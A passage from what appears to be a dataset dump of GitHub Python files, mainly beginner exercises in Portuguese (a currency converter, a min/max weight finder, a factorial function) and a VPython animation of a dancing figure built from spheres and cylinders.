"text": "# dolar = (franco[1], euro[2], iene[3], rublo[4], real[5] )\nUSD = (1.09647, 1.18611, 0.00957115, 0.0130646, 0.184561)\n# franco = (dolar[1], euro[2], iene[3], rublo[4], real[5])\nCHF = (0.912088, 1.08190, 0.00872883, 0.0119166, 0.168380)\n# euro = (dolar[1], franco[2], iene[3], rublo[4], real[5])\nEUR = (0.843038, 0.924249, 0.00806778, 0.0110138, 0.155594)\n# iene = (dolar[1], franco[2], euro[3], rublo[4], real[5] )\nJPY = (104.493, 114.549, 123.939, 1.36509, 19.2881)\n# rublo (dolar[1], franco[2], euro[3], iene[4], real[5])\nRUB = (76.5400, 83.9150, 90.7922, 0.732615, 14.1297)\n# real = (dolar[1], franco[2], euro[3], iene[4], rublo[5])\nREAL = (5.41665, 5.93738, 6.43010, 0.0518823, 0.0708227)\n\n\ndef Dolar():\n if opc == 2:\n print(f'O valor em Franco {moeda} convertido para Dolar e {moeda * USD[0]:.2f}')\n elif opc == 3:\n print(f'O valor em Euro {moeda} convertido para Dolar e {moeda * USD[1]:.2f}')\n elif opc == 4:\n print(f'O valor em Iene {moeda} convertido para Dolar e {moeda * USD[2]:.2f}')\n elif opc == 5:\n print(f'O valor em Rublo {moeda} convertido para Dolar e {moeda * USD[3]:.2f}')\n elif opc == 6:\n print(f'O valor em Real{moeda} convertido para Dolar e {moeda * USD[4]:.2f}')\n\n\ndef Franco():\n if opc == 1:\n print(f'O valor em Dolar {moeda} convertido para Franco e {moeda * CHF[0]:.2f}')\n elif opc == 3:\n print(f'O valor em Euro {moeda} convertido para Franco e {moeda * CHF[1]:.2f}')\n elif opc == 4:\n print(f'O valor em Iene {moeda} convertido para Franco e {moeda * CHF[2]:.2f}')\n elif opc == 5:\n print(f'O valor em Rublo {moeda} convertido para Franco e {moeda * CHF[3]:.2f}')\n elif opc == 6:\n print(f'O valor em Real {moeda} convertido para Franco e {moeda * CHF[4]:.2f}')\n\n\ndef Euro():\n if opc == 1:\n print(f'O valor em Dolar {moeda} convertido para Euro e {moeda * EUR[0]:.2f}')\n elif opc == 2:\n print(f'O valor em Franco {moeda} convertido para Euro e {moeda * EUR[1]:.2f}')\n elif opc == 4:\n print(f'O valor em Iene {moeda} convertido para Euro e {moeda * EUR[2]:.2f}')\n elif opc == 5:\n print(f'O valor em Rublo {moeda} convertido para Euro e {moeda * EUR[3]:.2f}')\n elif opc == 6:\n print(f'O valor em Real {moeda} convertido para Euro e {moeda * EUR[4]:.2f}')\n\n\ndef Iene():\n if opc == 1:\n print(f'O valor em Dolar {moeda} convertido para Iene e {moeda * JPY[0]:.2f}')\n elif opc == 2:\n print(f'O valor em Franco {moeda} convertido para Iene e {moeda * JPY[1]:.2f}')\n elif opc == 3:\n print(f'O valor em Euro {moeda} convertido para Iene e {moeda * JPY[2]:.2f}')\n elif opc == 5:\n print(f'O valor em Rublo {moeda} convertido para Iene e {moeda * JPY[3]:.2f}')\n elif opc == 6:\n print(f'O valor em Real {moeda} convertido para Iene e {moeda * JPY[4]:.2f}')\n\n\ndef Rublo():\n if opc == 1:\n print(f'O valor em Dolar {moeda} convertido para Rublo e {moeda * RUB[0]:.2f}')\n elif opc == 2:\n print(f'O valor em Franco {moeda} convertido para Rublo e{moeda * RUB[1]:.2f}')\n elif opc == 3:\n print(f'O valor em Euro {moeda} convertido para Rublo e {moeda * RUB[2]:.2f}')\n elif opc == 4:\n print(f'O valor em Iene {moeda} convertido para Rublo e {moeda * RUB[3]:.2f}')\n elif opc == 6:\n print(f'O valor em Real {moeda} convertido para Rublo e {moeda * RUB[4]:.2f}')\n\n\ndef Real():\n if opc == 1:\n print(f'O valor em Dolar {moeda} convertido para Real e {moeda * REAL[0]:.2f}')\n elif opc == 2:\n print(f'O valor em Franco {moeda} convertido para Real e{moeda * REAL[1]:.2f}')\n elif opc == 3:\n print(f'O valor em Euro {moeda} convertido para Real e {moeda * 
REAL[2]:.2f}')\n elif opc == 4:\n print(f'O valor em Iene {moeda} convertido para Real e {moeda * REAL[3]:.2f}')\n elif opc == 5:\n print(f'O valor em Rublo {moeda} convertido para Real e {moeda * REAL[4]:.2f}')\n\n\nwhile True:\n print('Qual moeda voce utiliza: ')\n print(\"=*\" * 12)\n print(\"=*\" * 3, '( 1 ) Dolar\\n', end=\"\")\n print(\"=*\" * 3, '( 2 ) Franco\\n', end=\"\")\n print(\"=*\" * 3, '( 3 ) Euro\\n', end=\"\")\n print(\"=*\" * 3, '( 4 ) Iene\\n', end=\"\")\n print(\"=*\" * 3, '( 5 ) Rublo\\n', end=\"\")\n print(\"=*\" * 3, '( 6 ) Real\\n', end=\"\")\n print(\"=*\" * 3, '( 7 ) Sair')\n print(\"=*\" * 12)\n opc = int(input('Digite opcao desejada de moeda 1 a 6 : '))\n if opc == 1:\n moeda = float(input('Digite o valor em Dolar voce deseja converte: \\n'))\n elif opc == 2:\n moeda = float(input('Digite o valor em Franco voce deseja converte: \\n'))\n elif opc == 3:\n moeda = float(input('Digite o valor em Euro voce deseja converte: \\n'))\n elif opc == 4:\n moeda = float(input('Digite o valor em Iene voce deseja converte: \\n'))\n elif opc == 5:\n moeda = float(input('Digite o valor em Rublo voce deseja converte: \\n'))\n elif opc == 6:\n moeda = float(input('Digite o valor em Real voce deseja converte: \\n'))\n elif opc == 7:\n print(\"Obrigado por usar o programa, Ate a proxima\")\n else:\n while opc > 7 or opc < 1:\n print('Opção invalida somente numeros inteiros de 1 a 7')\n opc = int(input('Digite opcao de moeda 1 a 6 : '))\n\n print('Para qual moeda voce deseja fazer intercambio: ')\n print('( 1 ) Dolar\\n'\n '( 2 ) Franco\\n'\n '( 3 ) Euro\\n'\n '( 4 ) Iene\\n'\n '( 5 ) Rublo\\n'\n '( 6 ) real \\n'\n '( 7 ) Todos'\n '( 8 ) Sair')\n\n print('Para qual voce deseja converter')\n opcao = int(input('Digite opcao de moeda para interecambia de 1 a 7 : '))\n while opcao > 8 or opcao < 1:\n print('Opção invalida somente numeros inteiros de 1 a 7')\n opcao = int(input('Digite opcao de moeda para interecambia de 1 a 7 : '))\n\n while opcao == opc:\n print('Não pode ser a mesma moeda')\n opcao = int(input('Digite opcao de moeda para interecambia de 1 a 7 : '))\n if opcao == 1:\n Dolar()\n elif opcao == 2:\n Franco()\n elif opcao == 3:\n Euro()\n elif opcao == 4:\n Iene()\n elif opcao == 5:\n Rublo()\n elif opcao == 6:\n Real()\n elif opcao == 7:\n Dolar()\n Franco()\n Euro()\n Iene()\n Rublo()\n Dolar()\n elif opcao == 8:\n print(\"Obrigado por usar o programa, Ate a proxima\")\n break\n"
},
{
"alpha_fraction": 0.5550239086151123,
"alphanum_fraction": 0.5645933151245117,
"avg_line_length": 26.799999237060547,
"blob_id": "67bd1d950b66ba0fb2fd622eb42d7424a99936fc",
"content_id": "84adfee96bf75abb7ba4547f752d2ea990d5ad63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 15,
"path": "/EX 055_Maior_e_menor_pesoV2.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "maior = 0\nmenor = 0\nnum = int(input(\"Digite quantas pessoas deseja adicionar: \"))\nfor c in range(1, num):\n peso = float(input(f'Digite o peso da {c} pessoa:'))\n if c == 1: \n maior = peso\n menor = peso\n else:\n if peso > maior:\n maior = peso \n if peso < menor:\n menor = peso\nprint(f\"O maior peso encontrado {maior}\")\nprint(f'O menor peso encontrado {menor}')\n\n"
},
{
"alpha_fraction": 0.4500907361507416,
"alphanum_fraction": 0.46098002791404724,
"avg_line_length": 22.95652198791504,
"blob_id": "2559e94f31426ceba0c7e51e9875fbca2d2dcfca",
"content_id": "691d02ff5569f2c8cbc02d8dafd92e92da145469",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 552,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 23,
"path": "/EX 102_Função para Fatorial.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def factorial(n , show = False):\n \"\"\"\n -> Calcula o fatorial de um numero\n :param n: O numero a ser calculado\n :param show: (optional) Mostra ou não a conta .\n :return: O valor do fatorial de um numero n.\n \"\"\"\n \n f = 1\n for c in range(n, 0, -1):\n print(f'{c}', end=' ')\n if show:\n print(f'{c}', end=' ')\n if c > 1:\n print(' X ', end='')\n else:\n print(' = ', end='')\n f *= c\n return f\n\n#print(factorial(10, show = True))\n\nhelp(factorial)\n"
}
] | 76 |
imotyashok/dancing-dude | https://github.com/imotyashok/dancing-dude | 933a71869919420e3ca79dbec24b58387f33514c | b39535e8982b55fa073478bd453f2c7cc80da1df | 3fc8e6e209d4c6ae153a54738f087421974811c7 | refs/heads/master | 2020-09-11T17:07:43.366695 | 2019-11-16T18:31:49 | 2019-11-16T18:31:49 | 222,133,641 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.3882484436035156,
"alphanum_fraction": 0.48577263951301575,
"avg_line_length": 29.190895080566406,
"blob_id": "4772897bb4fe0e45d4741b265fe131e355473322",
"content_id": "cbc0741caf64f704507859db8e54268c2457ed4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20559,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 681,
"path": "/finalproject.py",
"repo_name": "imotyashok/dancing-dude",
"src_encoding": "UTF-8",
"text": "# GlowScript 2.7 VPython\nfrom vpython import *\n\n\ndef Head():\n head = sphere(pos=vector(0, 4, 0), radius=1,\n texture=\"https://farm5.staticflickr.com/4855/46098387042_fc66d2185f_b.jpg\")\n return head\n\n\ndef Torso():\n torso = box(pos=vector(0, 1.25, 0),\n axis=vector(1, -10, 0), length=2,\n height=3, width=2, up=vector(0, 3, 1),\n texture=\"https://c1.staticflickr.com/3/2032/2344934553_09829bd59c_b.jpg\")\n return torso\n\n\ndef Leftarm():\n leftarm = cylinder(pos=vector(0.9, 2.2, 1),\n axis=vector(1, -3, 0), radius=0.5,\n texture=\"https://c1.staticflickr.com/3/2032/2344934553_09829bd59c_b.jpg\")\n return leftarm\n\n\ndef Rightarm():\n rightarm = cylinder(pos=vector(-1, 2.5, 0),\n axis=vector(-1, -3, -0.5), radius=0.5,\n texture=\"https://c1.staticflickr.com/3/2032/2344934553_09829bd59c_b.jpg\")\n return rightarm\n\n\ndef Leftleg():\n leftleg = cylinder(pos=vector(0.5, -0.25, -0.5),\n axis=vector(0, -4, -1), radius=0.6,\n texture=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQluZghTkuwfJZy_UsZrUaPePlr0CDM2gSK7Gzk3pn2J8EEeVeh\")\n return leftleg\n\n\ndef Rightleg():\n rightleg = cylinder(pos=vector(-0.75, -0.25, -0.5),\n axis=vector(0, -4, -1), radius=0.6,\n texture=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQluZghTkuwfJZy_UsZrUaPePlr0CDM2gSK7Gzk3pn2J8EEeVeh\")\n return rightleg\n\n\ndef Step1(h, t, la, ra, ll, rl):\n i = 0\n dy = 0.2\n while i <= 10:\n # step 2: he does a split -- down motion\n rate(50)\n h.pos.y -= dy\n t.pos.y -= dy\n ll.pos.y -= dy\n rl.pos.y -= dy\n ra.pos.y -= dy\n la.pos.y -= dy\n ll.rotate(angle=(-pi) / 25, axis=vec(0, 0, -5))\n rl.rotate(angle=(pi) / 20, axis=vec(0, 0, -5))\n ra.rotate(angle=(pi) / 20, axis=vec(0, 0, -5))\n la.rotate(angle=(-pi) / 50, axis=vec(0, 0, 5))\n i += 1\n\n\ndef Step2(h, t, la, ra, ll, rl):\n k = 10\n dy = 0.2\n while k >= 0:\n # step 3: he returns to position\n rate(50) # rate = 50\n h.pos.y += dy\n t.pos.y += dy\n ll.pos.y += dy\n rl.pos.y += dy\n ra.pos.y += dy\n la.pos.y += dy\n k -= 1\n ll.rotate(angle=(pi) / 25, axis=vec(0, 0, -5))\n rl.rotate(angle=(-pi) / 20, axis=vec(0, 0, -5))\n ra.rotate(angle=(-pi) / 20, axis=vec(0, 0, -5))\n la.rotate(angle=(pi) / 50, axis=vec(0, 0, 5))\n\n\ndef Step3(h, t, la, ra, ll, rl):\n i = 0\n while i < 10:\n # step 4: he raises left arm, steps to side\n rate(50) # rate = 50\n ra.pos.y -= 0.05\n ra.pos.z += 0.05\n ra.pos.x += 0.02\n ll.pos.x += 0.08\n h.pos.y -= 0.01\n h.pos.x -= 0.03\n t.pos.x += 0.03\n ll.rotate(angle=(-pi) / 75, axis=vec(0, 0, -5))\n rl.pos.x += 0.05\n t.rotate(angle=-pi / 150, axis=vec(0, 0, -5))\n la.rotate(angle=(-pi) / 13, axis=vec(0, 1, -5))\n ra.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n rl.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n h.rotate(angle=-pi / 50, axis=vec(0, 5, 0))\n\n i += 1\n\n\ndef Step4(h, t, la, ra, ll, rl):\n i = 10\n while i >= 0:\n # step 5: he returns to position\n rate(50)\n ra.pos.y += 0.05\n ra.pos.z -= 0.05\n ra.pos.x -= 0.02\n ll.pos.x -= 0.08\n h.pos.y += 0.01\n h.pos.x += 0.03\n t.pos.x -= 0.03\n ll.rotate(angle=(pi) / 90, axis=vec(0, 0, -5))\n rl.pos.x -= 0.05\n t.rotate(angle=pi / 150, axis=vec(0, 0, -5))\n la.rotate(angle=(pi) / 13, axis=vec(0, 1, -5))\n ra.rotate(angle=(-pi) / 100, axis=vec(0, 0, -5))\n rl.rotate(angle=(-pi) / 130, axis=vec(0, 0, -5))\n h.rotate(angle=pi / 50, axis=vec(0, 5, 0))\n\n i -= 1\n\n\ndef Step5(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 6: he raises right arm\n rate(50) # rate = 50\n h.pos.x += 0.05\n h.pos.y -= 0.02\n ll.pos.x += 0.01\n ll.pos.z += 0.03\n 
ll.pos.y -= 0.01\n rl.pos.x -= 0.02\n t.pos.x += 0.01\n la.pos.y -= 0.01\n la.pos.x += 0.01\n ra.pos.x += 0.01\n rl.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n ll.rotate(angle=(-pi) / 110, axis=vec(0, 0, -5))\n t.rotate(angle=(pi) / 230, axis=vec(0, 0, -5))\n ra.rotate(angle=(pi) / 13, axis=vec(0, 0, -5))\n la.rotate(angle=(-pi) / 100, axis=vec(0, 0, -5))\n h.rotate(angle=(pi) / 50, axis=vec(0, 5, 0))\n\n i += 1\n\n\ndef Step6(h, t, la, ra, ll, rl):\n i = 10\n while i >= 0:\n # he returns to position\n rate(50) # rate = 50\n h.pos.x -= 0.05\n h.pos.y += 0.02\n ll.pos.x -= 0.01\n ll.pos.z -= 0.03\n ll.pos.y += 0.01\n rl.pos.x += 0.02\n t.pos.x -= 0.01\n la.pos.y += 0.01\n la.pos.x -= 0.01\n ra.pos.x -= 0.01\n rl.rotate(angle=(-pi) / 100, axis=vec(0, 0, -5))\n ll.rotate(angle=(pi) / 110, axis=vec(0, 0, -5))\n t.rotate(angle=(-pi) / 230, axis=vec(0, 0, -5))\n ra.rotate(angle=(-pi) / 13, axis=vec(0, 0, -5))\n la.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n h.rotate(angle=(-pi) / 50, axis=vec(0, 5, 0))\n i -= 1\n\n\ndef Step7(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n rate(40) # rate = 40\n h.pos.x += 0.05\n h.pos.y -= 0.02\n ll.pos.x += 0.01\n ll.pos.z += 0.03\n ll.pos.y -= 0.01\n rl.pos.x -= 0.02\n t.pos.x += 0.01\n la.pos.y -= 0.01\n la.pos.x += 0.01\n ra.pos.x += 0.01\n rl.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n ll.rotate(angle=(-pi) / 110, axis=vec(0, 0, -5))\n t.rotate(angle=(pi) / 230, axis=vec(0, 0, -5))\n ra.rotate(angle=(pi) / 15, axis=vec(0, 0, -5))\n la.rotate(angle=(-pi) / 100, axis=vec(0, 0, -5))\n h.rotate(angle=(pi) / 50, axis=vec(0, 15, 0))\n\n i += 1\n\n\ndef Step8(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 7 in diagram\n rate(40) # rate = 40\n h.pos.x -= 0.02\n h.pos.y -= 0.02\n h.pos.z += 0.1\n t.pos.x += 0.02\n ll.pos.x += 0.025\n rl.pos.x += 0.05\n la.pos.x += 0.01\n ra.pos.x += 0.01\n ll.pos.y += 0.01\n rl.pos.y += 0.01\n t.rotate(angle=(pi) / 200, axis=vec(0, 0, 5))\n ll.rotate(angle=(pi) / 150, axis=vec(0, 0, -5))\n rl.rotate(angle=(-pi) / 150, axis=vec(0, 0, -5))\n ra.rotate(angle=(pi) / 50, axis=vec(0, 8, -10))\n la.rotate(angle=(-pi) / 13, axis=vec(0, 1, -5))\n # torso.pos.x\n i += 1\n\n\ndef Step9(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 8 in diagram\n rate(40) # rate = 40\n t.pos.y -= 0.02\n t.pos.x -= 0.01\n t.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n rl.pos.y -= 0.01\n rl.pos.x -= 0.05\n rl.rotate(angle=(-pi) / 150, axis=vec(0, 0, -5))\n ll.pos.y -= 0.02\n ll.pos.x -= 0.04\n ll.rotate(angle=(-pi) / 150, axis=vec(0, 0, -5))\n ra.rotate(angle=(-pi) / 14, axis=vec(0, 0, -5))\n ra.pos.x += 0.03\n ra.pos.y += 0.01\n la.rotate(angle=(pi) / 28, axis=vec(0, 1, -5))\n la.pos.y -= 0.05\n h.pos.y -= 0.02\n h.pos.x += 0.04\n h.pos.z -= 0.03\n\n i += 1\n\n\ndef Step10(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 9\n rate(40) # rate = 40\n t.rotate(angle=(-pi) / 55, axis=vec(0, 0, -5))\n t.pos.x += 0.01\n t.pos.y -= 0.02\n ll.pos.x += 0.08\n ll.pos.y -= 0.01\n ll.rotate(angle=(pi) / 85, axis=vec(0, 0, -5))\n rl.pos.x += 0.09\n rl.pos.y -= 0.04\n rl.rotate(angle=(pi) / 140, axis=vec(0, 0, -5))\n la.pos.x -= 0.03\n la.pos.y += 0.02\n ra.pos.z -= 0.01\n ra.pos.x -= 0.04\n ra.pos.y -= 0.08\n h.pos.y -= 0.02\n h.pos.x -= 0.09\n\n i += 1\n\n\ndef Step11(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 10\n rate(40) # rate = 40\n t.rotate(angle=(pi) / 55, axis=vec(0, 0, -5))\n t.pos.x -= 0.01\n t.pos.y += 0.02\n ll.pos.x -= 0.08\n ll.pos.y += 0.01\n ll.rotate(angle=(-pi) / 85, axis=vec(0, 0, -5))\n rl.pos.x -= 
0.09\n rl.pos.y += 0.04\n rl.rotate(angle=(-pi) / 140, axis=vec(0, 0, -5))\n la.pos.x += 0.03\n la.pos.y -= 0.02\n ra.pos.z += 0.01\n ra.pos.x += 0.04\n ra.pos.y += 0.08\n h.pos.y += 0.02\n h.pos.x += 0.09\n\n i += 1\n\n\ndef Step12(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 11\n rate(40) # rate = 40\n t.rotate(angle=(-pi) / 60, axis=vec(0, 0, -5))\n t.pos.x += 0.01\n t.pos.y -= 0.01\n ra.pos.x -= 0.04\n ra.pos.y -= 0.05\n ra.pos.z += 0.05\n ra.rotate(angle=pi / 10, axis=vec(-20, -5, 15))\n la.pos.x -= 0.02\n la.pos.y += 0.035\n la.rotate(angle=pi / 100, axis=vec(0, 0, -5))\n rl.pos.x += 0.08\n rl.pos.y -= 0.02\n rl.pos.z += 0.02\n rl.rotate(angle=pi / 100, axis=vec(0, 0, -5))\n ll.pos.x += 0.08\n ll.pos.z += 0.02\n ll.rotate(angle=pi / 100, axis=vec(0, 0, -5))\n h.pos.x -= 0.09\n h.pos.y -= 0.01\n h.rotate(angle=(-pi) / 50, axis=vec(0, 15, 0))\n\n i += 1\n\n\ndef Step13(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 12\n rate(30) # rate = 30\n t.pos.x += 0.1\n t.rotate(angle=(pi) / 80, axis=vec(0, 0, -5))\n t.rotate(angle=(pi) / 10, axis=vec(0, 15, 7))\n h.pos.x += 0.18\n h.pos.y += 0.01\n h.rotate(angle=(pi) / 12, axis=vec(0, 5, 0))\n la.pos.x -= 0.04\n la.pos.y += 0.01\n la.pos.z -= 0.02\n la.rotate(angle=(pi) / 10, axis=vec(0, 10, 5))\n ra.rotate(angle=(pi) / 10, axis=vec(0, 5, 5))\n ra.pos.x += 0.333\n ll.pos.x -= 0.05\n ll.pos.y -= 0.01\n ll.rotate(angle=(pi) / 20, axis=vec(0, 10, 0))\n rl.pos.x += 0.2\n rl.pos.y -= 0.03\n rl.pos.z -= 0.02\n rl.rotate(angle=(pi) / 15, axis=vec(0, 10, 0))\n\n i += 1\n\n\ndef Step14(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 13\n rate(50) # rate = 40\n t.rotate(angle=(pi) / 85, axis=vec(0, 0, 5))\n t.pos.x += 0.05\n la.rotate(angle=(-pi) / 150, axis=vec(0, 0, -5))\n la.pos.y -= 0.04\n la.pos.x += 0.015\n la.pos.z += 0.02\n # rightarm.rotate(angle=(-pi)/100, axis=vec(0,0,5))\n ra.pos.x += 0.01\n ra.pos.y += 0.015\n ra.pos.z += 0.01\n ll.pos.x += 0.08\n ll.pos.y -= 0.01\n ll.rotate(angle=(-pi) / 170, axis=vec(0, 0, 5))\n rl.pos.x += 0.08\n rl.pos.y -= 0.02\n rl.pos.z -= 0.02\n rl.rotate(angle=(-pi) / 150, axis=vec(0, 0, 5))\n h.pos.x -= 0.05\n h.pos.y -= 0.005\n\n i += 1\n\n\ndef Step15(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 14 --returns to position at step 12\n rate(40) # rate = 40\n t.rotate(angle=(-pi) / 85, axis=vec(0, 0, 5))\n t.pos.x -= 0.05\n la.rotate(angle=(pi) / 150, axis=vec(0, 0, -5))\n la.pos.y += 0.04\n la.pos.x -= 0.015\n la.pos.z -= 0.02\n # rightarm.rotate(angle=(-pi)/100, axis=vec(0,0,5))\n ra.pos.x -= 0.01\n ra.pos.y -= 0.015\n ra.pos.z -= 0.01\n ll.pos.x -= 0.08\n ll.pos.y += 0.01\n ll.rotate(angle=(pi) / 170, axis=vec(0, 0, 5))\n rl.pos.x -= 0.08\n rl.pos.y += 0.02\n rl.pos.z += 0.02\n rl.rotate(angle=(pi) / 150, axis=vec(0, 0, 5))\n h.pos.x += 0.05\n h.pos.y += 0.005\n\n i += 1\n\n\ndef Step16(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 15\n rate(40) # rate = 40\n t.pos.x += 0.2\n t.rotate(angle=(pi) / 11.5, axis=vec(0.75, 15, 3.5))\n la.pos.x += 0.35\n la.rotate(angle=(pi) / 11.5, axis=vec(0, 10, 0))\n ra.pos.x -= 0.03\n ra.rotate(angle=(pi) / 11, axis=vec(0.5, 10, 3.5))\n h.pos.x += 0.15\n h.rotate(angle=(pi) / 11, axis=vec(0, 10, 1))\n ll.pos.x += 0.333\n ll.rotate(angle=(pi) / 11.5, axis=vec(0, 10, 0))\n rl.pos.x += 0.1\n rl.rotate(angle=(pi) / 15, axis=vec(0.5, 10, -2))\n\n i += 1\n\n\ndef Step17(h, t, la, ra, ll, rl):\n sleep(0.3)\n i = 0\n while i <= 5:\n rate(10) # rate = 10\n if h.pos.x < 3:\n h.pos.x += 0.4\n h.pos.y += 0.04\n else:\n h.pos.x -= 0.25\n 
h.pos.y -= 0.01\n i += 1\n\n\ndef Step18(h, t, la, ra, ll, rl):\n sleep(0.05)\n i = 0\n while i <= 10:\n # step 16\n rate(25) # rate = 25\n t.pos.y -= 0.2\n t.pos.x += 0.1\n t.rotate(angle=(pi) / 30, axis=vec(-3, 0, 10))\n la.pos.y -= 0.15\n la.pos.x -= 0.065\n la.pos.z -= 0.02\n la.rotate(angle=(pi) / 150, axis=vec(0, 0, 10))\n ra.rotate(angle=(pi) / 150, axis=vec(0, 0, 5))\n ll.pos.y -= 0.06\n ll.pos.x += 0.2\n ll.rotate(angle=(pi) / 50, axis=vec(0, 0, 10))\n rl.pos.x += 0.26\n rl.pos.y -= 0.16\n rl.rotate(angle=(pi) / 40, axis=vec(0, 0, 10))\n ra.pos.x += 0.05\n ra.pos.y -= 0.35\n ra.rotate(angle=(pi) / 14, axis=vec(-1, 0, 10))\n h.pos.y -= 0.333\n h.pos.x -= 0.1\n h.pos.z -= 0.01\n h.rotate(angle=(pi) / 70, axis=vec(0, 0, 10))\n\n i += 1\n\n\ndef Step19(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n rate(35)\n t.pos.x -= 0.1\n t.pos.y += 0.08\n t.rotate(angle=(pi) / 30, axis=vec(-3, 0, 10))\n la.pos.x -= 0.15\n la.pos.y -= 0.05\n la.pos.z -= 0.03\n la.rotate(angle=(pi) / 12, axis=vec(0, -3, 10))\n h.pos.y -= 0.14\n h.pos.x -= 0.07\n h.pos.z -= 0.06\n h.rotate(angle=(pi) / 20, axis=vec(0, -3, 10))\n ll.pos.x -= 0.22\n ll.pos.y += 0.2\n ll.rotate(angle=(pi) / 11, axis=vec(0, 0, 10))\n rl.pos.x -= 0.08\n rl.pos.y += 0.25\n rl.rotate(angle=(pi) / 55, axis=vec(0, -3, 10))\n\n i += 1\n\n\ndef Step20(h, t, la, ra, ll, rl):\n # sleep(1)\n i = 0\n while i <= 10:\n rate(20)\n # t.pos.x -= 0.07\n # t.pos.y += 0.02\n # t.rotate(angle=(pi)/10.5, axis=vec(0,10,-0.5))\n t.rotate(angle=(pi) / 5.5, axis=vec(0, 10, 0), origin=vec(3.1, -1.5, 0))\n h.rotate(angle=pi / 5.5, axis=vec(0, 10, 0), origin=vec(3, 0, 0))\n rl.rotate(angle=(pi) / 5.5, axis=vec(0, 10, 0), origin=vec(3, 0, 0))\n ll.rotate(angle=(pi) / 5.5, axis=vec(0, 10, 0), origin=vec(3, 0, 0))\n la.rotate(angle=(pi) / 5.5, axis=vec(0, 10, 0), origin=vec(3, 0, 0))\n ra.rotate(angle=pi / 5.5, axis=vec(0, 10, 0))\n\n i += 1\n\n\ndef Step21(h, t, la, ra, ll, rl):\n sleep(0.1)\n i = 0\n while i <= 10:\n rate(40)\n t.rotate(angle=pi / 100, axis=vec(0, 0, 10), origin=vec(1, 0, 0))\n t.pos.y -= 0.05\n t.pos.x -= 0.05\n ll.rotate(angle=-pi / 150, axis=vec(0, 0, 10), origin=vec(3, 5, 0))\n rl.rotate(angle=pi / 25, axis=vec(0, 0, 10), origin=vec(4.5, 0, 0))\n la.rotate(angle=-pi / 40, axis=vec(0, 0, 10), origin=vec(0.4, -0.08, 0))\n la.pos.y += 0.05\n h.rotate(angle=pi / 150, axis=vec(0, 0, 10), origin=vec(4, -1, 0))\n\n i += 1\n\n\ndef Step22(h, t, la, ra, ll, rl):\n sleep(0.05)\n i = 0\n while i <= 10:\n rate(45)\n ll.rotate(angle=-pi / 35, axis=vec(0, 0, 10))\n ra.rotate(angle=-pi / 100, axis=vec(0, 0, 10))\n la.rotate(angle=pi / 40, axis=vec(0, 0, 10))\n h.rotate(angle=-pi / 100, axis=vec(5, 0, 10))\n\n i += 1\n\n\ndef Step23(h, t, la, ra, ll, rl):\n # sleep(1.5)\n i = 0\n while i <= 10:\n rate(45)\n t.rotate(angle=-pi / 13, axis=vec(-3.8, 0, 10), origin=vec(5, -0.5, 0))\n rl.rotate(angle=-pi / 11.333, axis=vec(0, 0, 10), origin=vec(5.5, -0.5, 0))\n ll.rotate(angle=-pi / 13.333, axis=vec(0, 0, 10), origin=vec(5.75, -0.7, 0))\n ll.pos.x += 0.0333\n ll.pos.y -= 0.155\n ra.rotate(angle=-pi / 15, axis=vec(0, 0, 10), origin=vec(5, -0.75, 0))\n la.rotate(angle=-pi / 13.333, axis=vec(0, 0, 10), origin=vec(5.25, -0.7, 0))\n h.rotate(angle=-pi / 13, axis=vec(-3.8, 0, 10), origin=vec(5, -0.5, 0))\n # ra.pos.x += 0.3\n # ra.pos.y -= 0.025\n\n i += 1\n\n\ndef Step24(h, t, la, ra, ll, rl):\n sleep(0.1)\n i = 0\n while i <= 10:\n rate(40)\n la.rotate(angle=pi / 40, axis=vec(0, 0, 10))\n h.rotate(angle=pi / 70, axis=vec(-2, 5, 5))\n ll.rotate(angle=-pi / 135, 
